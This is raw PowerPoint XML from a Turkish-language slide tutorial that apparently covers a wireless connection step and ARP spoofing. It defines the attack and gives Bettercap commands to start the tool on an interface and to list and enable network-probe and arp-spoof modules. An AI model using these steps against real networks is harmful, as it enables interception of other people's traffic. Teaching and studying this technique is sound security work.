                <a:cubicBezTo>
                  <a:pt x="2932510" y="12720"/>
                  <a:pt x="3023998" y="17286"/>
                  <a:pt x="3289046" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3554094" y="-17286"/>
                  <a:pt x="3836668" y="10296"/>
                  <a:pt x="3994793" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3993836" y="8431"/>
                  <a:pt x="3994444" y="14612"/>
                  <a:pt x="3994793" y="27432"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3751330" y="45147"/>
                  <a:pt x="3618521" y="7232"/>
                  <a:pt x="3328994" y="27432"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3039467" y="47632"/>
                  <a:pt x="2908653" y="25202"/>
                  <a:pt x="2783039" y="27432"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2657426" y="29662"/>
                  <a:pt x="2373985" y="40038"/>
                  <a:pt x="2237084" y="27432"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2100183" y="14826"/>
                  <a:pt x="1862145" y="31781"/>
                  <a:pt x="1531337" y="27432"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1200529" y="23083"/>
                  <a:pt x="1153029" y="12124"/>
                  <a:pt x="945434" y="27432"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="737839" y="42740"/>
                  <a:pt x="371500" y="-18970"/>
                  <a:pt x="0" y="27432"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="226" y="18208"/>
                  <a:pt x="-648" y="12891"/>
                  <a:pt x="0" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
              <a:path w="3994793" h="27432" stroke="0" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="233202" y="14567"/>
                  <a:pt x="387388" y="28518"/>
                  <a:pt x="625851" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="864314" y="-28518"/>
                  <a:pt x="1027047" y="-26118"/>
                  <a:pt x="1171806" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1316566" y="26118"/>
                  <a:pt x="1639655" y="-2490"/>
                  <a:pt x="1917501" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2195348" y="2490"/>
                  <a:pt x="2328758" y="19053"/>
                  <a:pt x="2543352" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2757946" y="-19053"/>
                  <a:pt x="3028913" y="23876"/>
                  <a:pt x="3169202" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3309491" y="-23876"/>
                  <a:pt x="3706249" y="-31775"/>
                  <a:pt x="3994793" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3993438" y="9524"/>
                  <a:pt x="3993591" y="13975"/>
                  <a:pt x="3994793" y="27432"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3717302" y="841"/>
                  <a:pt x="3475105" y="20835"/>
                  <a:pt x="3328994" y="27432"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3182883" y="34029"/>
                  <a:pt x="3048913" y="25304"/>
                  <a:pt x="2783039" y="27432"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2517165" y="29560"/>
                  <a:pt x="2371663" y="19960"/>
                  <a:pt x="2117240" y="27432"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1862817" y="34904"/>
                  <a:pt x="1771642" y="53179"/>
                  <a:pt x="1451441" y="27432"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1131240" y="1685"/>
                  <a:pt x="1013354" y="33667"/>
                  <a:pt x="825591" y="27432"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="637828" y="21198"/>
                  <a:pt x="270465" y="28145"/>
                  <a:pt x="0" y="27432"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-800" y="16780"/>
                  <a:pt x="-583" y="1291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564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3F6CB5D9-7B75-B0D8-A15F-DD3713281547}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="5613400" cy="5800726"/>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F882BE86-E32E-C407-7807-9958F28D77A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5613400" y="0"/>
            <a:ext cx="6134100" cy="5800726"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Metin kutusu 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E219F43E-3F90-4966-F678-69814AF54FAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="6000750"/>
            <a:ext cx="11587163" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>İşlem başarılı bir şekilde tamamlandı. Artık kablosuz ağa bağlantı sağlanır..</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="353501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650B7D-040D-4387-9610-D05A04C62BBC}"/>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Arp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Spoofing</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR"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465C5BBD-F242-351F-3067-0882701E7ED2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1690687"/>
            <a:ext cx="10515600" cy="4674253"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Yerel ağ saldırılarında sıklıkla karşılaşılan hacking türüdür. Saldırgan sızdığı ağdaki cihazların Mac adreslerini taklit ederek bilgilerimize ulaşır.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Resim 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BE89CF5-E87A-92D8-EC61-FB265CC35F48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="889923" y="2886075"/>
            <a:ext cx="10387677" cy="3295269"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="302080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CE46CD13-D76B-028E-6C6D-A796DC4BF023}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect r="37101"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="180279" y="161490"/>
            <a:ext cx="11827082" cy="5782110"/>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2" name="Metin kutusu 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D31ADFB-1E52-1878-8D21-BB7040F10787}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="266700" y="5988624"/>
            <a:ext cx="11658600" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>«</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>bettercap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>iface</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> eth0» </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>paremetresi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> ile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Bettercap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> aracı başlatılır. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>«</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>help</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>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parametresi ile modüller görüntülenir.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3063529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şaret, levha içeren bir resim&#10;&#10;Açıklama otomatik olarak oluşturuldu">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F6F55F0-BDC5-820E-C36D-8B50073A5FE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="-1"/>
            <a:ext cx="3120571" cy="3180067"/>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91081AFE-6329-017B-B3A6-E8FE58ABCC70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3120568" y="87803"/>
            <a:ext cx="9071430" cy="3004457"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Resim 6" descr="metin içeren bir resim&#10;&#10;Açıklama otomatik olarak oluşturuldu">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{135805A4-76C0-19F2-F32C-78D97B40C3C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3229427"/>
            <a:ext cx="3120570" cy="3628573"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Resim 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BB90806-50D0-49F9-5300-521AB9FBEC64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3120569" y="3004456"/>
            <a:ext cx="9071431" cy="1814287"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Resim 12" descr="metin, ekran, ekran görüntüsü, siyah içeren bir resim&#10;&#10;Açıklama otomatik olarak oluşturuldu">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBC8F7D3-0C52-74DC-3E78-C0B5FF047416}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3120568" y="4818743"/>
            <a:ext cx="9071430" cy="2088618"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Dikdörtgen 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D89B5BB9-FB36-51C4-1CD6-12E2261553EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1785257" y="0"/>
            <a:ext cx="1030514" cy="333829"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="571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Dikdörtgen 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C73BD44B-77AC-BA88-92DA-8625CDEEDE48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="510363" y="2222205"/>
            <a:ext cx="2610205" cy="542260"/>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Dikdörtgen 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4264CD9B-1106-AF24-DE4A-B193E64E4F59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="233916" y="5571460"/>
            <a:ext cx="2371061" cy="581920"/>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Sol Ok 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56A2A6BA-60D1-6682-E45D-E29EB4D03990}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="155818"/>
            <a:ext cx="868326" cy="1669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Sol Ok 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D122D60F-46A8-3F67-95FD-5E78B2102AA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7375452" y="798284"/>
            <a:ext cx="868326" cy="1669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Sol Ok 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52E78C61-5957-CBAD-CC84-21AF73F071A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7412667" y="1049287"/>
            <a:ext cx="868326" cy="1669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Sol Ok 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5EB45C5-D74A-863A-F430-96A1FAFC5A9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6007396" y="3229427"/>
            <a:ext cx="868326" cy="1669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Dikdörtgen 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F3F7569-6661-7B17-D313-422068E7C57A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4774019" y="3872044"/>
            <a:ext cx="5263116" cy="295919"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="5715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Sol Ok 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F8F6617-35AE-C03A-F3D5-24F06D8230C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6241138" y="4902200"/>
            <a:ext cx="868326" cy="1669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5" name="Düz Ok Bağlayıcısı 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FAE2FB7-8C44-1ED5-AF1D-6C693E69DB3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1785257" y="2902690"/>
            <a:ext cx="0" cy="2466753"/>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B42C8559-9FF4-1B8A-6982-12A12DA80203}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8486775" y="798284"/>
            <a:ext cx="3500438" cy="1077218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>help</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>net.probe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> komutu ile arp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>spoof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> işlemi modülleri gözlemlenebilir.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>net.probe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> on komutu ile modül başlatılır.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Dikdörtgen 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
